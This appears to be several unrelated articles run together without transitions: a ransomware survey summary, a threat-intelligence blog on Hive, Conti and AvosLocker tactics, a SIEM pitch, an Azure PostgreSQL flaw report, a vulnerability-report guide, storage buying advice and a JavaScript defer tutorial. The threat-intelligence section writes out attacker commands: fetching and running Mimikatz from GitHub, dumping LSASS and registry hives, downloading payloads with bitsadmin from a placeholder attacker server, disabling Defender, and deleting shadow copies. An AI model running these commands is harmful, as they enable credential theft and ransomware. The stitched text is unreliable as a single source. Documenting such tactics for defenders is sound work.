Today Sophos has released the State of Ransomware 2022, its annual study of the real-world ransomware experiences of IT professionals working at the frontline around the globe.
The study has revealed an ever more challenging attack environment together with the growing financial and operational burden ransomware places on its victims. It also shines new light on the relationship between ransomware and cyber insurance, and the role insurance is playing in driving changes to cyber defenses.
This year, 5,600 IT professionals from 31 countries participated in the research, with 965 sharing details of ransom payments made. Key findings include:
Ransom attacks are more frequent – 66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020
Ransom payments are higher – In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020, while the percentage of organizations paying less than $10,000 dropped to 21% from 34% in 2020. Overall, the average ransom paid by organizations that had data encrypted in their most significant ransomware attack increased nearly fivefold to reach $812,360
More victims are paying the ransom – In 2021, 46% of organizations that had data encrypted in a ransomware attack paid the ransom. Twenty-six percent of organizations that were able to restore encrypted data using backups in 2021 also paid the ransom
The impact of a ransomware attack can be immense – The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. It took on average one month to recover from the damage and disruption. 90% of organizations said the attack had impacted their ability to operate, and 86% of private sector victims said they had lost business and/or revenue because of the attack
Many organizations rely on cyber insurance to help them recover from a ransomware attack – 83% of mid-sized organizations had cyber insurance that covers them in the event of a ransomware attack
Cyber insurance almost always pays out – In 98% of incidents where the victim had cyber insurance that covered ransomware, the insurer paid some or all of the costs incurred (with 40% overall covering the ransom payment)
94% of those with cyber insurance said that their experience of getting it has changed over the last 12 months, with higher demands for cybersecurity measures, more complex or expensive policies and fewer organizations offering insurance protection
“The findings suggest we may have reached a peak in the evolutionary journey of ransomware, where attackers’ greed for ever higher ransom payments is colliding head on with a hardening of the cyber insurance market as insurers increasingly seek to reduce their ransomware risk and exposure,” said Chester Wisniewski, principal research scientist at Sophos.
“In recent years, it has become increasingly easy for cybercriminals to deploy ransomware, with almost everything available as-a-service. Second, many cyber insurance providers have covered a wide range of ransomware recovery costs, including the ransom, likely contributing to ever higher ransom demands. However, the results indicate that cyber insurance is getting tougher and in the future ransomware victims may become less willing or less able to pay sky high ransoms. Sadly, this is unlikely to reduce the overall risk of a ransomware attack. Ransomware attacks are not as resource intensive as some other, more hand-crafted cyberattacks, so any return is a return worth grabbing and cybercriminals will continue to go after the low hanging fruit.”
Sophos commissioned research agency Vanson Bourne to conduct an independent, vendor-agnostic survey of 5,600 IT professionals in mid-sized organizations (100-5,000 employees) across 31 countries. The survey was conducted during January and February 2022, and respondents were asked to respond based on their experiences over the previous year. Respondents were from Australia, Austria, Belgium, Brazil, Canada, Chile, Colombia, Czech Republic, France, Germany, Hungary, India, Israel, Italy, Japan, Malaysia, Mexico, Netherlands, Nigeria, Philippines, Poland, Saudi Arabia, Singapore, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK, and US.
Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.
Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.
Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:
Hive
Conti
AvosLocker
Similar to many other ransomware families, Hive, Conti, and AvosLocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model, the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.
Once initial access to a victim network has been gained, Hive, Conti, and AvosLocker use a plethora of TTPs to help the operators achieve the following:
Gain persistence on the network
Escalate privileges
Tamper with and evade security software
Laterally move across the network
Initial Access
Affiliates for the Hive, Conti, and AvosLocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:
Spear phishing leading to the deployment of malware, including but not limited to:
IcedID
Emotet
QakBot
TrickBot
Taking advantage of weak RDP credentials
Exploiting vulnerabilities such as:
Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
Apache Log4j vulnerability – CVE-2021-44228
In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.
Persistence
After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
Actors are also known to create additional users on compromised systems to maintain access. In some instances, we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:
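For example, automatic logon can be configured through the Winlogon registry values; the following commands are a representative sketch (the account name and password are placeholders), not the exact entries observed:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "<username>" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "<password>" /f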
Discovery
During the discovery phase, the ransomware actors try to sweep the victim's network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:
ADRecon – Gathers Active Directory information and generates a report
Netscan – Discovers devices on the network
Credential Access
Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and AvosLocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:
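A download-and-run one-liner of this kind typically looks like the following (a representative sketch; the repository path is a placeholder):
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/<repository>/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"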
In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full
Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. On rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.
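For example, the hives can be saved with reg.exe (representative commands) and the credentials extracted from the saved files offline:
reg save HKLM\SAM sam.hive
reg save HKLM\SECURITY security.hive
reg save HKLM\SYSTEM system.hive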
Lateral Movement
Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.
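Representative examples of such PsExec, WMI, and BITSAdmin usage (target host, attacker server, and payload names are placeholders):
psexec \\<target> -s cmd /c C:\Windows\Temp\<payload>.exe
wmic /node:"<target>" process call create "cmd /c C:\Windows\Temp\<payload>.exe"
bitsadmin /transfer <job_name> /download /priority high http://<attacker_server>/<payload>.exe C:\Windows\Temp\<payload>.exe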
Defense Evasion
As with a number of other ransomware families, Hive, Conti, and AvosLocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sc commands to disable or terminate them, as shown below. In some cases they also use tools like PC Hunter to end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.
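Representative examples of such commands (service and process names are placeholders):
net stop <security_service>
sc config <security_service> start= disabled
taskkill /F /IM <security_process>.exe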
Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.
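Representative examples of such commands (the exact values vary between attacks):
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f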
Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
We have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:
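The commands typically look like the following (representative examples):
bcdedit /set {default} recoveryenabled no
bcdedit /set {default} bootstatuspolicy ignoreallfailures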
Exfiltration
Attackers commonly exfiltrate critical data from a victim's environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:
https://anonfiles.com
https://mega.nz
https://send.exploit.in
https://ufile.io
https://www.sendspace.com
We have also seen attackers use the following tools for data exfiltration:
FileZilla
Rclone
Conclusion
The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.
Symantec Protection
Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.
AV Protection
Ransom.Hive
Ransom.Conti
Ransom.AvosLocker
Backdoor.Cobalt
Hacktool.Mimikatz
Trojan.IcedID*
Trojan.Emotet*
W32.Qakbot*
Trojan.Trickybot*
Behavioral Protection
SONAR.RansomHive!g2
SONAR.RansomHive!g3
SONAR.RansomHive!g4
SONAR.RansomAvos!g2
SONAR.RansomConti!g1
SONAR.RansomConti!g3
SONAR.RansomConti!g4
SONAR.Ransomware!g30
SONAR.RansomGregor!g1
SONAR.SuspLaunch!gen4
SONAR.SuspLaunch!g18
SONAR.Ransom!gen59
SONAR.Ransomware!g26
SONAR.Cryptlck!g171
Intrusion Prevention System (IPS) detections
IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.
The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.
Symantec recommends that you have intrusion prevention enabled on all your devices including servers.
Adaptive Protection
Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.
Recommendations
Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.
A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.
A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts.
The main benefits of having corporate SIEM systems are as follows:
A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources.
It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.
It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company.
It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators can configure an event to be created whenever the company's maintenance activities log is changed, as well as in Windows. Then, if there is any malicious activity, they can decide whether or not to validate these adjustments.
It provides cyberattack control and protection, so the organization can act before an attack becomes an irreversible problem, filtering out whether it is a real attack or a false alarm. Known or unknown attacks are analyzed, whether they are malwareless attacks (which resort to the legitimate tools of the system itself), DDoS attacks, or advanced persistent threats (APTs).
In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.
In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before it causes a slowdown or a total company service outage.
Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate.
Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EPDR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making.
Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region.
“By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers’ databases,” Microsoft Security Response Center (MSRC) said.
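Microsoft has not published the vulnerable expression itself, but the bug class is easy to illustrate. In the hypothetical JavaScript sketch below, a check meant to accept only the literal replication role name is missing its anchors, so any username that merely contains the expected string also passes:
// Hypothetical sketch of an improperly anchored check, not Microsoft's actual code
const anchored = /^replication$/; // anchored: matches only the exact role name
const unanchored = /replication/; // unanchored: matches any name containing the string
console.log(anchored.test("attacker_replication_x")); // false: rejected
console.log(unanchored.test("attacker_replication_x")); // true: the bypass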
New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain “ExtraReplica.” Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022.
Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target’s Azure region and exfiltrate sensitive information.
In other words, successful exploitation of the critical flaws could have enabled an adversary to gain unauthorized read access to other customers’ PostgreSQL databases, effectively circumventing tenant isolation.
Wiz traced the privilege escalation to a bug stemming from modifications introduced in the PostgreSQL engine to harden its privilege model and add new features. The name ExtraReplica comes from the fact that the exploit leverages a PostgreSQL feature that permits copying database data from one server to another, i.e., "replicating" the database.
The Windows maker described the security vulnerability as affecting PostgreSQL Flexible Server instances deployed using the public access networking option, but stressed that it did not find evidence of the flaw being actively exploited and that no customer data was accessed.
“No action is required by customers,” MSRC said. “In order to further minimize exposure, we recommend that customers enable private network access when setting up their Flexible Server instances.”
You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”
Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.
As it's likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn't a moment to waste. So let's dive straight in.
What is a Vulnerability Assessment Report and why do you need one?
A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.
A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.
The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:
— Customers need to trust you
Weaknesses in your IT systems could affect your customers' operations. With supply chain attacks on the rise, a vulnerability in a single company could leave a whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.
It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.
— The Board wants a better understanding of the business’ risk
Cyber security is a growing concern across many businesses, so chances are your board members want to get a better grip on the business's risk before a lack of insight into vulnerabilities turns into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an "all clear" report can give your business heads that needed peace of mind.
— Your auditors are checking for compliance
Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.
— Your CFO is renewing your cyber insurance
It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.
How often do you need to produce a vulnerability assessment report?
Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.
Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.
Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.
A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.
What should be included in a vulnerability assessment report?
Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.
As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.
Where can you get a Vulnerability Assessment Report from?
Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise, which can distract your security teams from other activities that will keep your organisation secure. That is why it's recommended to choose an external provider to produce your reports.
Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.
Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.
At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.
It’s possible you’ve read somewhere or someone gave you the following advice: a bigger SSD is faster. That is correct. If you take a specific SSD drive model and compare its 250 GB size variant to the 1 TB variant, the bigger one will be faster.
Again, I can’t stress this enough: we’re talking about the same model from the same manufacturer – only the size differs.
In this whole idea, we're talking about comparing something like the Kingston A400 240 GB model to the Kingston A400 960 GB model. In this example, even the manufacturer states about 100 MB/s faster write performance.
Ok, but why is a bigger SSD faster?
To put it simply, a bigger SSD has more NAND chip ranks and more channels that it can use in parallel. This leads to faster data transfer. This is, admittedly, a very simplified explanation.
This of course, varies from manufacturer to manufacturer and that is because there are different controllers out there, different things a manufacturer can do in the SSD’s firmware and so on. But usually, you’ll see a measurable difference between the low capacity drives and the higher capacity ones.
Consider the DRAM Cache
The way an SSD uses its cache is by placing data in this lower-latency area, called the cache, so future requests for that data can occur much faster. These caches are usually of two types: DRAM Cache or SLC Cache.
Fast SSDs usually have a DRAM cache. The controller of the SSD actually has this dynamic random-access memory (DRAM). Do not confuse this with the SLC cache.
Why would you care? Well, bigger SSDs have a bigger DRAM cache. Just check Samsung’s datasheet for the 870 EVO – on page 3 you’ll see the 1TB, 2TB, and 4TB have bigger and bigger DRAM caches than the 250/500GB drives.
DRAM Cache and SLC Cache are completely different animals. Yes, they both do the 'cache' action; they both have the purpose of accelerating the drive's speed, but the cost and logic are different.
A DRAM cache is basically a separate chip on the PCB of your SSD. This DRAM chip is responsible for the work in your SSD, just as your system RAM is responsible for the operation of your PC. It temporarily stores data for the purpose of accelerating processing.
And because of the temporary storage function of the DRAM cache, many read and write processes can directly use the data in this cache – and it is a lot faster than starting from the beginning.
When we're talking about the SLC cache, it is not a separate chip. Despite being called a cache, it is not a true SLC NAND Flash chip but a part of the space in the TLC or QLC NAND Flash IC that simulates the SLC writing method, meaning it writes only 1 bit of data in each cell. This does improve the read/write performance of the SSD, but not for as long or by as much as a DRAM cache.
But! For an SSD without a DRAM cache, just an SLC cache, the speeds will drop dramatically once that cache is exhausted by sequential writes: they drop to the original value of the TLC NAND Flash. For these types of SSDs, without a DRAM cache, the read/write speed indicated in the tech specs is usually measured using the SLC cache. (The test does not get to saturate the SLC cache, so the average speed is higher. But if the drive were really stressed, we'd see lower numbers once the SLC cache can't keep up.)
The bottom line is: a drive without a DRAM Cache will not be able to sustain those advertised speeds for long.
Plus, a bigger DRAM Cache means you can abuse that drive more. By abusing, I mean giving it heavy workloads like a lot of writes/reads at once.
My 2cents? Never buy a DRAM-less SSD. SSDs that have a DRAM cache are so cheap nowadays it does not make sense to trade off the performance. Heck, I’ve seen DRAM-less SSDs a couple of bucks more expensive than the ones with a DRAM cache. I don’t know why.
How to tell if that SSD has a DRAM cache?
Just look up the datasheet on the manufacturer’s website. PCpartpicker also sometimes lists this specification in the Cache column.
If I'm in a hurry and the manufacturer does not say anything about the DRAM cache, I will assume it has none. If I really want to know, I just Google some review of that model.
TBW – total bytes written
A specification where bigger drives win again, as they allow for more writes before failure.
To be fair, a normal gamer/user will probably never saturate this even if we're talking about a small drive. It takes a lot of work to actually write so much data, and usually… you'll probably want to upgrade to a bigger or faster drive before your old SSD fails.
Nonetheless, it is worth mentioning that the TBW figure is also bigger in a bigger SSD.
Always try to buy bigger and with DRAM Cache
Enough said. Spending a little more for a bigger drive with a DRAM cache is always worth it. Always!
Examples of popular SSDs that do have a DRAM cache:
Do note that the list above is not complete. I’m sure I’ve missed some. Those are just some popular drives that I can actually recommend if you are looking for suggestions on what to buy – and always strive to get the biggest capacity you can afford!
Final thoughts
If there is something to remember from this whole article, it is this: buy as big as your budget allows and always buy an SSD that has a DRAM Cache. These two ideas will guarantee that you'll not be disappointed with your new SSD.
Buying a hard disk used to be quite easy. Now we have stuff like CMR vs SMR drives, manufacturers not being completely clear in their product showcase pages, and so on.
TLDR: To keep things short, you should strive to buy a CMR drive because SMR drives, while they work just fine, are usually slower in every typical individual test carried out by a lot of people out there. SMR drives are slower because their method of writing data aims for storage density, and one of the drawbacks of this goal is speed.
And before we continue, yes, even if manufacturers have developed firmware that optimizes the read and write performance of SMR drives, they are still not as good as a CMR drive.
Tip: some great benchmarks for hard disk drives are: Crystal Disk Mark, ATTO Disk Benchmark, HD Tune, and even PCMark has some storage benchmarks.
CMR or PMR drives – how they work
CMR comes from Conventional Magnetic Recording. It is also known as PMR, which comes from Perpendicular Magnetic Recording.
The way CMR works is by aligning the poles of the magnetic elements, which represent bits of data, perpendicularly to the surface of the disk. The magnetic tracks are written side-by-side without overlapping.
And because the write head is usually quite large in comparison to the read head, HDD manufacturers aim to shrink the size of the write head as much as possible.
SMR – how do these drives work?
Shingled Magnetic Recording, or SMR, is an extension to PMR. It basically offers improved density. And this happens because rather than writing each magnetic track without overlapping, SMR overlaps each new track with part of the previous track. One way to think about it is by comparing it to the shingles on a roof.
By overlapping the tracks, write heads become a lot thinner, and we get a bigger areal density.
CMR vs SMR drives – why does it actually matter?
In short, because you want the best performance for your dollar.
But to get a little bit more technical: regardless of whether an HDD uses CMR or SMR, when new data is written to the drive, the tracks are fully readable without performance impact.
So we have a pretty good read speed, right? No matter what we choose? Right? Kind of. Not really. Well, it depends on how you use the drive.
But! On an SMR drive, when any data is edited or overwritten, the write head will not overwrite the data on the existing magnetic track. It will write the new data on an empty area of the disk, while the original track with the old data temporarily sits put. Then, when the SMR HDD becomes idle, it enters a 'reorganization mode', where the old bits of data on the original track are erased and made available for future use.
This reorganization procedure must occur, which makes idle time essential on an SMR drive. If you hit an SMR drive hard with write and read operations, it won't get to do this reorganization quickly, and the drive will have to write new data and reorganize at the same time. This impacts the overall read and write performance of the drive.
How can I tell if the HDD I want to buy is SMR or CMR?
Some manufacturers make it easy, some not so much. But basically, searching with something like ‘product code SMR or CMR’ on Google will lead you to a good result most of the time.
Now, Western Digital, on their homepage in the shop section, actually lists CMR or SMR for their drives in the ‘Full Specifications’ area, at the Recording Technology specification. Neat!
For Seagate, however, you have to go to the product page, and download the PDF datasheet. Oh well, I guess it works.
Here's a breakdown of what is what, usually, at least for the common models. Please search online or on the manufacturer's website in case the data below becomes outdated. It was last looked up on 29.01.2022, on the manufacturers' websites, just so you know.
But if you get an amazing price, and you know that hard drive will not get a lot of writes, edits, and deletions… well, it might make sense, since it is the actual heavy usage of erasing, editing, and writing data that causes the 'slowness'. Like if you were to just fill it up with movies and that's it. Those movies will not get edited, deleted or anything – they will just be read when you watch them. I'm thinking about selfhosting something like Plex or Nextcloud… or a DIY NAS. I'd still opt for a CMR drive – what kind of discount are we talking about, to be fair? 10% is not worth it in my opinion.
Closing thoughts
Basically, aim for a CMR drive. And if you are new to the whole computer parts upgrade or stuff… don’t stress if you are buying a NAS drive for your desktop PC. It does not matter, it will work the same – maybe even last longer!
Hard disk buying is now as tedious as buying another component, I guess – one more thing to look for besides the usual specifications. I do hope that testing, developing, and working with diverse methods and technologies of storing data will eventually lead to manufacturers developing more performant and higher density hard disks. Just imagine a 100 TB HDD! That would be insane.
I hope this article helped you figure out what you need – an SMR or a CMR drive and why it matters.
Learn how to defer parsing of JavaScript to improve your pagespeed score, and how you can fix the 'Eliminate render-blocking of JavaScript' warning in Google PageSpeed Insights by deferring non-critical JavaScript(s). The newer version of Google PageSpeed Insights refers to this issue as 'Eliminate render-blocking resources'; these render-blocking resources may include JavaScript and CSS.
In this article, I will cover what defer parsing of JavaScript is, how to defer parsing of JavaScript properly, why you should defer parsing of JavaScript, how to find the render-blocking JavaScript(s) that need to be deferred, how to defer multiple JavaScripts in one go, how you can defer parsing of JavaScript in WordPress with or without a plugin, and how deferred loading of JavaScript helps to speed up your website.
In a nutshell, we’ll eliminate render-blocking JavaScript(s) not by actually removing (deleting) them from the website code but by defer loading them. So that they stop blocking the loading (rendering) of meaningful content (the first paint) of the website.
These terms (the above terminology) might be overwhelming for you at first, especially if you’re not a tech guy.
But, don’t worry about that!
I am going to explain everything step by step in simple words. So that you can proceed at your pace and implement the methods to fix ‘Eliminate render-blocking resources’ on your website/blog.
A web page is made up of several components, which include HTML, CSS/stylesheets, JavaScript, and graphical (images & icons) components, etc. These components are stacked one over another in the code structure of the web page.
When a user types your website URL in the web browser's address bar and hits enter, the browser first establishes a connection with the server on which your website is hosted.
Once the connection is established, the browser starts rendering the components of the webpage to display the web page.
The browser renders the components serially from the top towards the bottom of the webpage. That means what comes first is rendered first, and so on.
When the browser encounters JavaScript on a web page, it downloads the JavaScript, executes it, and then proceeds to render the next component. During this time, the browser stops rendering the rest of the web page.
Every time the browser encounters JavaScript, it stops rendering the rest of the webpage until it renders and executes the encountered JavaScript.
That’s how JavaScript blocks the critical rendering path.
To avoid this situation, Google Engineers recommend deferring non-critical JavaScript.
The question still remains the same, What is Defer Parsing of JavaScript?
Defer Parsing of JavaScript can be defined as the process of using defer or async attribute with JavaScript to avoid render blocking of the first paint of a web page. These attributes tell the web browser to parse and execute the JavaScript in parallel (asynchronously) or after (defer) the parsing of HTML of a web page. Thus, the visitors need not wait longer to see the meaningful content of the web page.
Difference between defer or async
Now you know that there are two attributes, defer and async, that can be used to defer JavaScript loading.
Before we talk about the difference between defer and async, let's see how the <script> tag works.
Legend
<script>
When we use the <script> tag to add a script in our code, HTML parsing continues until the script file is reached; from then on, parsing is paused until the script file is downloaded and executed.
Suitability: Not recommended in most cases.
<script defer>
When defer attribute is appended with script tag, the script file is downloaded alongside the HTML parsing but the downloaded script executes only after the completion of HTML parsing.
Suitability: For non-critical script files.
<script async>
When the async attribute is used with the script tag, the script file downloads during HTML parsing; HTML parsing then pauses just to execute the downloaded script file.
Suitability: For critical script files that cannot be inline.
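Putting the three behaviors together, here is a minimal sketch (the file names are placeholders):
<script src="legacy.js"></script> <!-- blocks HTML parsing while it downloads and executes -->
<script src="app.js" defer></script> <!-- downloads in parallel, executes after HTML parsing completes -->
<script src="ads.js" async></script> <!-- downloads in parallel, pauses parsing only to execute -->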
Defer loading of JS & PageSpeed Insights recommendation
Let’s try to put this in a perspective with Google PageSpeed Insights warning and recommendation.
When you test a website using the Google PageSpeed Insights tool, you get some warnings and recommendations to fix those warnings/errors.
The PageSpeed Insights (PSI) text for render-blocking resources says:
Eliminate render-blocking resources.
Resources are blocking the first paint of your page. Consider delivering critical JS/CSS inline and deferring all non-critical JS/styles.
This warning triggers for two different elements, i.e., JavaScript (JS) and CSS, when either of them blocks the critical rendering path during website loading. Here in this article, we are discussing the JavaScript part.
(In the previous version of PageSpeed Insights Tool, the same warning (for the JavaScript) used to be called ‘Eliminate render-blocking of JavaScript’.)
In simple words, this warning triggers when there are some JavaScript(s) loading on your website which blocks the loading of the content that matters most to your visitors.
This means your visitors have to wait longer to see the meaningful content of your website because JavaScript(s) are blocking the rendering of content.
Clearly, PageSpeed Insights or other site speed testing tools (GTmetrix, etc.) show this warning/error if your site loads some JavaScript(s) that block the loading of meaningful content (the first paint) of your site.
And this needs to be fixed.
